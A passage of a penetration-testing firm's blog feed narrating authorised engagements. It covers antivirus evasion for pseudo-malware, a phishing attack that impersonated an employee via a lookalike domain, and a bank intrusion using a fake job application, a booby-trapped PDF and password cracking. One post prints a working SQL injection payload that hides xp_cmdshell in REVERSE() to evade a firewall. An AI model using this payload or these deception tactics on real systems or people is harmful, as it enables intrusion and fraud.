As you can see, the Pseudo Malware passed all antivirus scanners as clean.</p><p class="MsoNormal">Now that we've prevented antivirus software from being able to detect our Pseudo Malware, we need to distribute it to our victims. Distribution can happen many ways that include but are not limited to infected USB drives, infected CD-ROMs, phishing emails augmented by IDN homograph attacks with the Pseudo Malware attached, Facebook, LinkedIn, MySpace, binding to PDF-like files, etc.</p><p class="MsoNormal">Our preferred method for infection is email (or maybe not). This is because it is usually very easy to gather email addresses using various existing email harvesting technologies and we can hit a large number of people at the same time. When using email, we may embed a link that points directly to our Pseudo Malware, or we might just insert the malware directly into the email. Infection simply requires that the user click our link or run the attached executable. 
In either case, the Pseudo Malware is fast and quiet and the user doesn't notice anything strange.</p><p class="MsoNormal">Once a computer is infected with our Pseudo Malware it connects back to our <a href="http://en.wikipedia.org/wiki/Botnet">Command and Control server</a> and grants us access to the system unbeknownst to the user. Once we have access we can do anything that the user can do, including but not limited to seeing the user's screen as if we were right there, running programs, installing software, uninstalling software, activating webcams and microphones, accessing and manipulating hardware, etc. More importantly, we can use that computer to compromise the rest of the network through a process called <a href="http://www.phrack.org/issues.html?issue=55&id=16">Distributed Metastasis</a>. </p><p class="MsoNormal">Despite how easy it is to bypass antivirus technologies, we still very strongly recommend using them, as they keep you protected from known malware variants. </p><div class="blogger-post-footer">Netragard, LLC. 
-- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-58079504592886313672010-06-14T04:14:00.001-07:002010-06-14T17:08:08.657-07:00Security Vulnerability Penetration Assessment Test?Our philosophy here at Netragard is that security-testing services must produce a threat that is at least equal to the threat that our customers are likely to face in the real world. If we test our customers at a lesser threat level and a higher-level threat attempts to align with their risks, then they will likely suffer a compromise. If they do suffer a compromise, then the money that they spent on testing services might as well be added to the cost in damages that result from the breach.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiij23ZFrgWtV_TjErUheM2Joa7Rl9hVh6fdv4310G4n3DP3JgvaU_lMib7_aCxf5dKPOAwx35X8l8BSWO4b8_nsTN5My06iL1wVs3HM2R7eM_DfLiHMEz_H-gg_7wOrHWToDx2obE_awI/s1600/Screen+shot+2010-06-14+at+8.01.38+PM.png"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 287px; height: 323px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiij23ZFrgWtV_TjErUheM2Joa7Rl9hVh6fdv4310G4n3DP3JgvaU_lMib7_aCxf5dKPOAwx35X8l8BSWO4b8_nsTN5My06iL1wVs3HM2R7eM_DfLiHMEz_H-gg_7wOrHWToDx2obE_awI/s400/Screen+shot+2010-06-14+at+8.01.38+PM.png" alt="" id="BLOGGER_PHOTO_ID_5482785212908080706" border="0" /></a>This is akin to how armor is tested. Armor is designed to protect something from a specific threat. In order to be effective, the armor is exposed to a level of threat that is slightly higher than what it will likely face in the real world. If the armor is penetrated during testing, it is enhanced and hardened until the threat cannot defeat the armor. If armor is penetrated in battle then there are casualties. 
That class of testing is called Penetration Testing, and the level of threat produced has a very significant impact on test quality and results.<br /><br />What is particularly scary is that many of the security vendors who offer Penetration Testing services either don't know what Penetration Testing is or don’t know the definitions for the terms. Many security vendors confuse Penetration Testing with Vulnerability Assessments, and that confusion translates to the customer. The terms are not interchangeable and they do not define methodology; they only define testing class. So before we can explain service quality and threat, we must first properly define services.<br /><br />Based on the English dictionary, the word “Vulnerability” is best defined as susceptibility to harm or attack. Being vulnerable is the state of being exposed. The word “Assessment” is best defined as the means by which the value of something is estimated or determined, usually through the process of testing. As such, a “Vulnerability Assessment” is a best estimate as to how susceptible something is to harm or attack.<br /><br />Let's do the same for “Penetration Test”. The word “Penetration” is best defined as the act of entering into or through something, or the ability to make way into or through something. The word “Test” is best defined as the means by which the presence, quality or genuineness of anything is determined. As such, the term “Penetration Test” means to determine the presence of points where something can make its way through or into something else.<br /><br />Despite what many people think, neither term is specific to Information Technology. Penetration Tests and Vulnerability Assessments existed well before the advent of the microchip. In fact, the ancient Romans used a form of penetration testing to test their armor against various types of projectiles. Today, we perform Structural Vulnerability Assessments against things like the Eiffel Tower and the Golden Gate Bridge. 
Vulnerability Assessments are chosen because Structural Penetration Tests would damage, or possibly destroy, the structure.<br /><br />In the physical world Penetration Testing is almost always destructive (at least to a degree), but in the digital world it isn’t destructive when done properly. This is mostly because in the digital world we’re penetrating a virtual boundary and in the physical world we’re penetrating a physical boundary. When you penetrate a virtual boundary you’re not really creating a hole; you’re usually creating a process in memory that can be killed or otherwise removed. <br /><br />When applied to IT Security, a Vulnerability Assessment isn't as accurate as a Penetration Test. This is because Vulnerability Assessments are best estimates and Penetration Tests either penetrate or they don’t. As such, a quality Vulnerability Assessment report will contain few false positives (false findings), while a quality Penetration Testing report should contain absolutely no false positives (though they do sometimes contain theoretical findings).<br /><br />The quality of service is determined by the talent of the team delivering services and by the methodology used for service delivery. A team of research-capable ethical hackers who have a background in exploit development and system / network penetration will usually deliver higher quality services than a team of people who are not research capable. If a team claims to be research capable, ask them for example exploit code that they’ve written and ask them for advisories that they’ve published.<br /><br />Service quality is also directly tied to threat capability. The threat in this case is defined by the capability of real world malicious hackers. If testing services do not produce a threat level that is at least equal to the real world threat, then the services are probably not worth buying. 
After all, the purpose for security testing is to identify risks so that they can be fixed / patched / eliminated before malicious hackers exploit them. But if the security testing services are less capable than the malicious hacker, then chances are the hacker will find something that the service missed.<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-58443820275342462522010-06-11T11:29:00.000-07:002010-06-11T11:54:11.303-07:00We Are Politically Incorrect<div style="text-align: center;"><br /></div><div style="text-align: left;">Back in February of 2009 we released an article called <a href="http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html">FaceBook from the hackers perspective</a>.<span style="mso-spacerun: yes"> </span>As far as we know, we were the first to publish a detailed article about using Social Networking Websites to deliver surgical Social Engineering attacks. Since that time, we noticed a significant increase in marketing hype around Social Engineering from various other security companies. 
The problem is that they're not telling you the whole truth.</div><p class="MsoNormal"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 366px; height: 103px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg64p6eSQhHgAmWJzgwYf0NgJMTBDchykY1G2qiHf0m_9c3jEOnUQxHEpn1yXKQ4RqFjSX0sjctt-JXldiqX2mk8ijmO-uaQzkG-9EktGW6E0H7hLGDy70jb1B-YOUfwsFlTzETZrOoXYs/s400/Screen+shot+2010-06-11+at+2.31.53+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5481585837192092850" /></p><p class="MsoNormal">The whole truth is that Social Engineering is a necessary but potentially dangerous service.<span style="mso-spacerun: yes"> </span>Social Engineering at its roots is the act of exploiting the human vulnerability and as such is an offensive and <a href="http://en.wikipedia.org/wiki/Politically_Incorrect">politically incorrect</a> service.<span style="mso-spacerun: yes"> </span>If a customer’s business has any pre-existing social or political issues then Social Engineering can be like putting a match to a powder keg.<span style="mso-spacerun: yes"> </span>In some cases the damages can be serious and can result in legal action between employee and employer, or visa versa.</p><p class="MsoNormal"><span style="mso-spacerun: yes">It’s for this reason that businesses need to make sure that their environments are conducive to receiving social attacks, and that they are prepared to deal with the emotional consequences that might follow.<span style="mso-spacerun: yes"> </span>If employees are trained properly and if security policies are enforced that cover the social vector, then things “should” be ok. 
If those policies don’t exist and if there’s any internal turmoil, high-risk employees, or potentially delicate political situations, then Social Engineering is probably not such a great idea as it will likely identify and exploit one of those pre-existing issues.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">For example, we recently delivered services to a customer that had pre-existing issues but assumed that their environment was safe for testing with Social Engineering.<span style="mso-spacerun: yes"> </span>In this particular case the customer had an employee that we’ll call Jane Doe who was running her own business on the side.<span style="mso-spacerun: yes"> </span>Jane Doe was advertising her real employers name on her business website making it appear as if there was a relationship between her employer and her business.<span style="mso-spacerun: yes"> </span>She was also advertising her business address as her employers address on her FaceBook fan page.<span style="mso-spacerun: yes"> </span>From our perspective, Jane Doe was a perfect Social Engineering target.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">With this social risk identified, we decided that we’d impersonate Jane Doe and hijack the existing relationships that she had with our customer (her employer).<span style="mso-spacerun: yes"> </span>We accomplished this with a specially crafted phishing attack.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">The first step in the phish was to collect content for the phishing email.<span style="mso-spacerun: yes"> </span>In this case Jane Doe posted images to her FaceBook fan page that included a photo of herself and a copy of her businesses logo. We used those images to create an email that looked like it originated from Jane Doe’s email address at our customers network and was offering the recipient discounted pricing. 
(Her FaceBook privacy settings were set to allow everybody.)</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">Once we had the content for the phishing email set up we used an </span><span><a href="http://en.wikipedia.org/wiki/IDN_homograph_attack">IDN homograph attack </a></span><span style="mso-spacerun: yes">to register a new domain that appeared to be identical to our customers domain.<span style="mso-spacerun: yes"> </span>For example, if our customer was SNOsoft and their real domain was snosoft.com, the fake domain looked just like “snosoft.com”.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">We embedded a link into the phishing email using the fake domain to give it a legitimate look and feel.<span style="mso-spacerun: yes"> </span>The link was advertised as the place to click to get information about specially discounted offerings that were specific to our customer’s employees.<span style="mso-spacerun: yes"> </span>Of course, the link really pointed to our web server where we were hosting a </span><span><a href="http://www.snosoft.com/pwnt.html">browser based exploit</a></span><span style="mso-spacerun: yes">.</span></p><p class="MsoNormal"><span style="mso-spacerun: yes">Then we collected email addresses using an enumerator and loaded those into a distribution list.<span style="mso-spacerun: yes"> </span>We sent a test email to ourselves first to make sure that everything would render ok.<span style="mso-spacerun: yes"> </span>Once our testing was complete, we clicked send and the phish was on its way.<span style="mso-spacerun: yes"> </span>Within 15 minutes of delivering the attack our customer called us and requested that all testing be stopped.<span style="mso-spacerun: yes"> </span>But by that time, 38 people had already clicked on our embedded URL, and more clicks were on their way.</span></p><p class="MsoNormal"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; 
height: 286px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht2mZFuOiO0lYPvi-1fmUljR8BgAGkfGw18_B9LpDLGpJYmDA2VLNAKkHwTCrXWq5lQ-Gld5cKP3pRCnFTCiCXsQ-GVs27YuWAWB-6spBLuYGO2yyQ2h89WbMTLzsIcHNeHOOHp1JNaxY/s400/Screen+shot+2010-06-11+at+2.36.03+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5481586981584125570" /></p><p class="MsoNormal">As it turns out, our customer wasn’t prepared to receive Social Engineering tests despite the fact that they requested them. At first they accused us of being unprofessional because we used Jane Doe’s picture in the phishing email, which was apparently embarrassing to Jane Doe. Then they accused us of being politically incorrect for the same reason.</p><p class="MsoNormal">So we asked our customer, “Do you think that a black-hat would refrain from doing this because it’s politically incorrect?” Then we said, “Imagine if a black-hat launched this attack and received 38 clicks (and counting).” (Each click represents a potential compromise.)</p><p class="MsoNormal">While we can’t go into much more detail for reasons of confidentiality, the phishing attack uncovered other, more serious internal and political issues. Because of those issues, we had to discontinue testing and move to report delivery. There was no fault or error on our part, as everything was requested and authorized by the customer, but this was certainly a case of the match and the powder keg.</p><p class="MsoNormal">Despite the unfortunate circumstances, the customer did benefit significantly from the services. Specifically, the customer became aware of some very serious social risks that would have been extremely damaging had they been identified and exploited by black-hat hackers. Even if it was a painful process for the customer, we’re happy that we were able to deliver the services as we did, because they enabled our customer to reduce their overall risk and exposure profile.</p><p class="MsoNormal">The moral of the story is that businesses should take care and caution when requesting Social Engineering services. They should be prepared for uncomfortable situations and discoveries, and if possible they should train and prepare their employees in advance. In the end it boils down to one of two things: is it more important for a company to understand their risks, or is it more important to avoid embarrassing or offending an employee?</p>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-86910475990955659702010-05-16T21:55:00.000-07:002010-05-16T22:22:27.150-07:00REVERSE(noitcejnI LQS dnilB) Bank HackingEarlier this year we were hired to perform an Overt <a href="http://www.netragard.com/services_webassess.php">Web Application Penetration Test</a> for <a href="http://www.snosoft.com/hacked-2.html">one of our banking customers</a> (did you click that?). This customer is a recurring customer, and so we know that they have <a href="http://www.owasp.org/index.php/Web_Application_Firewall">Web Application Firewalls</a> and <a href="http://en.wikipedia.org/wiki/Intrusion_prevention_system">Network Intrusion Prevention Systems</a> in play. We also know that they are very security savvy and that they respond to attacks promptly and appropriately.<br /><p class="MsoNormal"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikEUskQIKXTLcirH3mhe8swVY48-4lyXOcy5kvVwiignNq_XLEaDhl5hWTGKVp3Pfy_9tJa_ExKiNlqONA50N5nU2Y9Lr85SG2zVAwA1BBfreiz4fSlz-alSuMBGGmz3z0a6njwm6L4m0/s1600/ear0874l.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 346px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikEUskQIKXTLcirH3mhe8swVY48-4lyXOcy5kvVwiignNq_XLEaDhl5hWTGKVp3Pfy_9tJa_ExKiNlqONA50N5nU2Y9Lr85SG2zVAwA1BBfreiz4fSlz-alSuMBGGmz3z0a6njwm6L4m0/s400/ear0874l.jpg" alt="" id="BLOGGER_PHOTO_ID_5472098542230302178" border="0" /></a></p> <p class="MsoNormal">Because this test was Overt in nature (non-stealth), we began testing by configuring <a href="http://www.acunetix.com/">Acunetix</a> to use <a 
href="http://portswigger.net/suite/pro.html">burpsuite-pro</a> as a proxy. Then we ran an automated Web Application Vulnerability Scan with Acunetix and watched the scan populate burpsuite-pro with information. While the scan results were mostly fruitless, we were able to pick up with manual testing and burpsuite-pro.</p> <p class="MsoNormal">While the automated scans didn’t find anything, our manual testing identified an interesting <a href="http://en.wikipedia.org/wiki/SQL_injection">Blind SQL Injection Vulnerability</a>. This blind SQL Injection vulnerability was the only vulnerability that we discovered that had any real potential.</p> <p class="MsoNormal">It’s important to understand the difference between standard SQL Injection Vulnerabilities and Blind SQL Injection Vulnerabilities. A standard SQL Injection Vulnerability will return useful error information to the attacker and usually display that information in the attacker’s web browser. That information helps the attacker debug and refine the attack. Blind SQL Injection Vulnerabilities return nothing (no error text or query output in the response), making them much more difficult to exploit.</p> <p class="MsoNormal">Since the target Web Application was protected by two different Intrusion Prevention Technologies, and since the vulnerability was a Blind SQL Injection Vulnerability, we knew that exploitation wasn’t going to be easy. To be successful we’d first need to defeat the Network Intrusion Prevention System and then the Web Application Firewall. 
</p> <p class="MsoNormal">Defeating Network Intrusion Prevention Systems is usually fairly easy. The key is to find an attack vector that the Network Intrusion Prevention System can’t monitor. In this case (like most cases), our Web Application’s server accepted connections over SSL (via HTTPS). Because SSL-based traffic is encrypted, the Network Intrusion Prevention System can’t intercept and analyze the traffic.</p> <p class="MsoNormal">Defeating Web Application Firewalls is a bit more challenging. In this case, the Web Application Firewall was the termination point for the SSL traffic, and so it didn’t suffer from the same SSL blindness issue that the Network Intrusion Prevention System did. In fact, the Web Application Firewall was detecting and blocking our embedded SQL commands very successfully.</p> <p class="MsoNormal">We tried some of the known techniques for bypassing Web Application Firewalls, but to no avail. The vendor that makes this particular Web Application Firewall does an excellent job of staying current with the latest methods for bypassing Web Application Firewall technologies.</p> <p class="MsoNormal">Then we decided that we’d try attacking backwards. Most SQL databases support a reverse function. 
That function does just what you’d think it would do: it returns the reverse of whatever string you feed it. So we wrote our commands backwards and encapsulated them in the reverse() function provided by the SQL server. When we fed our new reversed payloads to the Web Application, the Web Application Firewall failed to block the commands.</p> <p class="MsoNormal">As it turns out, most (maybe all) Web Application Firewalls can be bypassed if you reverse the spelling of your SQL commands. So you’d rewrite “xp_cmdshell” as “llehsdmc_px” and then encapsulate it in the reverse function. As far as we know, we’re the first to discover and use this method to successfully bypass a Web Application Firewall.</p> <p class="MsoNormal">The next step in the attack was to reconfigure and enable the xp_cmdshell function. xp_cmdshell is important as it executes a given command string as an operating-system command shell and returns any output as rows of text. Simply put, it’s just like sitting at the DOS prompt. 
</p> <p class="MsoNormal">The technique used to reconfigure the xp_cmdshell functionality is well known and well documented. But, since we did it using backwards commands, we thought that we would show you what it looked like.</p> <p style="font-weight: bold;" class="MsoNormal"><span style="font-size:85%;">var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@b) RECONFIGURE SET @c = REVERSE ('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--</span></p> <p class="MsoNormal">The above SQL commands do the following three things:</p> <p class="MsoNormal"><span style="font-weight: bold;">1-) C:\> show advanced options, 1</span></p> <p class="MsoNormal"><span style="font-size:85%;">Use the “show advanced options” option to display the sp_configure system stored procedure advanced options. When you set show advanced options to 1, you can list the advanced options by using sp_configure. The default is 0. 
The setting takes effect immediately without a server restart.</span></p> <p style="font-weight: bold;" class="MsoNormal">2-) C:\> <a href="http://www.google.com/search?hl=en&safe=off&client=safari&rls=en&ei=47XwS4-NIoS0lQeLluG1CA&sa=X&oi=spell&resnum=0&ct=result&cd=1&ved=0CCQQBSgA&q=master.dbo.sp_configure+xp_cmdshell,+1&spell=1"><span style="text-decoration: none; color: rgb(0, 0, 0);">master.dbo.sp_configure xp_cmdshell, 1</span></a></p> <p class="MsoNormal"><span style="font-size:85%;">This enables the xp_cmdshell functionality in the MsSQL database so that we can execute operating-system commands by calling xp_cmdshell. xp_cmdshell is disabled by default.</span></p> <p style="font-weight: bold;" class="MsoNormal">3-) C:\> ping netragard.com</p> <p class="MsoNormal"><span style="font-size:85%;">Because we were dealing with a Blind SQL Injection Vulnerability, we needed a creative way to test that we’d successfully re-enabled the xp_cmdshell function. To do that we set up a sniffer on our outside firewall interface and configured it to alert us when we received pings from our banking customer’s network. Then in the SQL payload (shown above) we included the command “ping netragard.com”. When we received ICMP packets from our customer’s network, we knew that our command had been executed successfully.</span></p> <p class="MsoNormal">Now that we had confirmed that our Blind Reversed SQL Injection attack was viable and that we had successfully enabled the xp_cmdshell functionality, the last thing for us to do was to extract database information. But how do we extract database information using a Blind SQL Injection Vulnerability if the vulnerability never returns any information?</p> <p class="MsoNormal">That's actually pretty easy. Most databases support conditional statements (if condition then do something). So, we used conditional statements combined with timing to extract database information. Specifically: if the table name equals "users", then wait for 3 seconds; if it doesn't, then return control immediately. Then, if the database doesn't respond for 3 seconds, we know that we've guessed the name of one of the tables correctly.</p><p class="MsoNormal">Sure there are other things that we could have done, but we're the good guys.</p>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com5tag:blogger.com,1999:blog-422477430134849438.post-8237726367276358732010-04-26T16:54:00.000-07:002011-03-06T22:20:13.799-08:00Netragard Hacking Your Bank<div style="text-align: left;">We were recently hired to perform an interesting Advanced Stealth Penetration test for a mid-sized bank. The goal of the penetration test was to penetrate into the bank’s IT Infrastructure and see how far we could get without detection. This is a bit different than most penetration tests, as we weren’t tasked with identifying risks as much as we were with demonstrating vulnerability.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbG0mJHh-Cst71wYGrl2Rp3jSwKBrTW8n7LbbgZFkP0etqkUiE5s-kgh1NlYtglVDWYViViqc8MrzElKK5Y5a8p8bGv2j1UjtLm_Df6Bt-TShxP23tjKUieusnJyGhS8rI61HxWcc5_Ag/s400/aton971l.jpg" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 364px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5581218867226253234" /></div><p 
class="MsoNormal"></p> <p class="MsoNormal">The first step of any penetration test is reconnaissance. Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy. It is technically impossible to effectively attack an enemy without first obtaining actionable intelligence about the enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage and a completely failed attack. In penetration testing, damages are realized as downed systems and a loss of revenue.</p> <p class="MsoNormal">Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance. We first targeted FaceBook with our “<a href="http://snosoft.blogspot.com/2009/02/facebook-from-hackers-perspective.html">FaceBook from the hackers perspective</a>” methodology. That enabled us to map relationships between employees, vendors, friends, family, etc. It also enabled us to identify key people in Accounts Receivable / Accounts Payable (“AR/AP”).</p> <p class="MsoNormal">In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT-related job openings that disclosed interesting and useful technical information about the bank. That information included, but was not limited to, what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.</p> <p class="MsoNormal">Naturally, we thought that it was also a good idea to apply for the job to see what else we could learn. To do that, we created a fake resume that was designed to be the “perfect fit” for a “Sr. IT Security Position” (one of the opportunities available). Within one day of submission of our fake resume, we had a telephone screening call scheduled.</p> <p class="MsoNormal">We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity. Once we felt that the conversation was flowing smoothly, we began to dig in a bit and started asking various technology questions. In doing so, we learned what Anti-Virus technologies were in use, and we also learned what the policies were for controlling outbound network traffic.</p> <p class="MsoNormal">That’s all that we needed…</p> <p class="MsoNormal">Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. 
In summary we learned:</p><ul><li>That the bank uses Windows XP for most Desktops</li><li>Who some of the bank’s vendors were (IT Services)</li><li>The names and email addresses of people in AR/AP</li><li>What Anti-Virus technology the bank uses</li><li>Information about the bank’s traffic control policies</li></ul> <p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">Based on the intelligence that we collected, we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF document to the bank’s AR/AP department from the bank’s trusted IT Services provider. This attack was designed to exploit the trust that our customer had with their existing IT Services provider.</p> <p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">When we created the PDF, we used the new reverse <a href="http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html">HTTPS payload</a> that was recently released by the <a href="http://www.metasploit.com/">Metasploit</a> Project. (Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS.) We like reverse HTTPS connections for two reasons:</p><ul><li>First, Intrusion Detection Technologies cannot monitor encrypted network traffic. Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.</li><li>Second, most companies allow outbound HTTPS (port 443) because it’s required to view many websites. The reverse HTTPS payload that we used mimics normal web browsing behavior and so is much less likely to set off any Intrusion Detection events.</li></ul><p class="MsoNormal">Before we sent the PDF to our customer, we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus. To evade the scanners we had to “<a href="http://polypack.eecs.umich.edu/">pack</a>” our pseudo-malware in such a way that it would not be detected by the scanners. Once that was done and tested, we were ready to launch our attack.</p><p class="MsoNormal">When we sent the PDF to our customer, it didn’t take long for the victim in AP/AR to open it; after all, it appeared to be a trusted invoice. Once it was opened, the victim’s computer was compromised. That resulted in it establishing a reverse connection to our lab, which we then tunneled into to take control of the victim’s computer (all via HTTPS).</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">Once we had control, our first order of operation was to maintain access. To do this we installed our own backdoor technology onto the victim’s computer. Our technology also used outbound HTTPS connections, but for authenticated command retrieval. So if our control connection to the victim’s computer was lost, we could just tell our backdoor to re-establish the connection.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">The next order of operation was to deploy our suite of tools on the compromised system and to begin scoping out the internal network. We used selective ARP poisoning as a first method for performing internal reconnaissance. That proved to be very useful, as we were able to quickly identify VNC connections and capture VNC authentication packets. As it turns out, the VNC connections that we captured were being made to the Active Directory (“AD”) server.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">We were able to crack the VNC password by using a VNC Cracking Tool. Once that happened we were able to access the AD server and extract the server’s SAM file. 
We then successfully cracked all of the passwords in that file, including the historical user passwords. Once the passwords were cracked, we found that the same credentials were used across multiple systems. As such, we were not only able to access desktops and servers, but also able to access Cisco devices, etc.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">In summary, we were able to penetrate into our customer’s IT Infrastructure and effectively take control of the entire infrastructure without being detected. We accomplished that by avoiding conventional methods for penetration and by using our own unorthodox yet obviously effective penetration methodologies.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">This particular engagement was interesting, as our customer’s goal was not to identify all points of risk, but instead to identify how deeply we could penetrate. Since the engagement, we’ve worked with that customer to help them create barriers for isolation in the event of penetration. Since those barriers have been implemented, we haven’t been able to penetrate as deeply.</p><p class="MsoListParagraphCxSpMiddle" style="margin-left:0in;mso-add-space:auto">As usual, if you have any questions or comments, please leave them on our blog. If there’s anything you’d like us to write about, please email me the suggestion. If I’ve made a grammatical mistake in here… I’m a hacker, not an English major.</p>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com22tag:blogger.com,1999:blog-422477430134849438.post-37546361876351513552010-04-06T13:25:00.000-07:002010-04-06T13:57:58.683-07:00Outbound Traffic Risk and ControlsRecently <a href="http://www.snosoft.com/hacked.html">one of our customers</a> asked me to provide them with information about the risks of unrestricted or lightly restricted outbound network traffic. As such, I decided to write this blog entry and share it with everyone. While some of the risks behind loose outbound network controls are obvious, others aren’t so obvious. I hope that this blog entry will help to shed some light on the not-so-obvious risks…<br /><br />In all networks, there are two general types of network traffic: inbound and outbound. Inbound network traffic is the type of traffic that is generated when an Internet-based user makes a network connection to a device that exists in your business infrastructure. Examples of such connections are browsing to your website, establishing a VPN connection, checking email, etc. Outbound network traffic is the type of traffic that is generated when a LAN-based user (or a VPN-connected user in some cases) makes a network connection to a device somewhere on the Internet.<br /><br />Just about everyone is familiar with the risks that are associated with the inbound type. Those risks include things like Vulnerable Web Applications, unpatched services running on Internet-facing production systems, etc. In fact, most people associate the idea of security with the inbound connection type more so than the outbound type. 
As a result, they end up leaving the most vulnerable part of their business open to attack.<br /><br />The truth is that the size of the attack surface for the outbound connection type is considerably larger than that of the inbound connection type. The attack surface is best defined as the sum of all potential risk points for a particular group of targets. In the case of the outbound connection type, the potential risk points include every variant of software installed on every device capable of making outbound connections (and helper applications too). This includes technologies like Adobe Acrobat, Mozilla Firefox, Internet Explorer, Flash, QuickTime, Microsoft Office, Safari, FTP Programs, Security Scanners, Antivirus Technologies, Smartphones, etc.<br /><br />One example of an attack would be something like this. An employee receives an email containing an interesting blog entry from Netragard, LLC. That email contains a link that points to a malicious payload designed to compromise the employee’s computer. When the link is clicked, a request is made to download the payload, which results in the employee’s computer being compromised. Upon compromise, the employee’s computer establishes an outbound *HTTPS connection to the attacker, and the attacker tunnels back in over that connection to take control of the employee’s computer. In most cases, the employee has no idea that they’ve been compromised, nor does their employer.<br /><br /><div style="text-align: center;"><span style="color: rgb(255, 0, 0);font-size:78%;">*Because the connection is an HTTPS connection, IDS/IPS technologies won’t flag it as suspicious, nor is it possible to sniff the connection, since it’s encrypted with SSL. </span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_1CCB-WUcnl1K-urWRBRq1fNb51xLOM0iZXA4BzGGDwC8jqCHaOYsIdD-44ERSuiCAeEbNqd2hhrtWzLtPI8EpQLlgvl1B2iZihdaK2skxPmeh5DJvfknJ6ld-0wY2xTgvPogIuhBGoc/s1600/spotthegeek.JPG"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_1CCB-WUcnl1K-urWRBRq1fNb51xLOM0iZXA4BzGGDwC8jqCHaOYsIdD-44ERSuiCAeEbNqd2hhrtWzLtPI8EpQLlgvl1B2iZihdaK2skxPmeh5DJvfknJ6ld-0wY2xTgvPogIuhBGoc/s400/spotthegeek.JPG" alt="" id="BLOGGER_PHOTO_ID_5457130358742215346" border="0" /></a><span style="font-size:78%;">(SNOsoft's Jayson Street)</span><br /></div><br />The compromise doesn’t stop at the employee’s computer. The instant that the employee’s computer is compromised, the network that the computer is connected to is also compromised. At that point the attacker can use ARP Poisoning to perform Man in the Middle attacks (or other more direct attacks), or just to capture user credentials. Either way, distributed metastasis is almost inevitable if the attacker has any semblance of skill. 
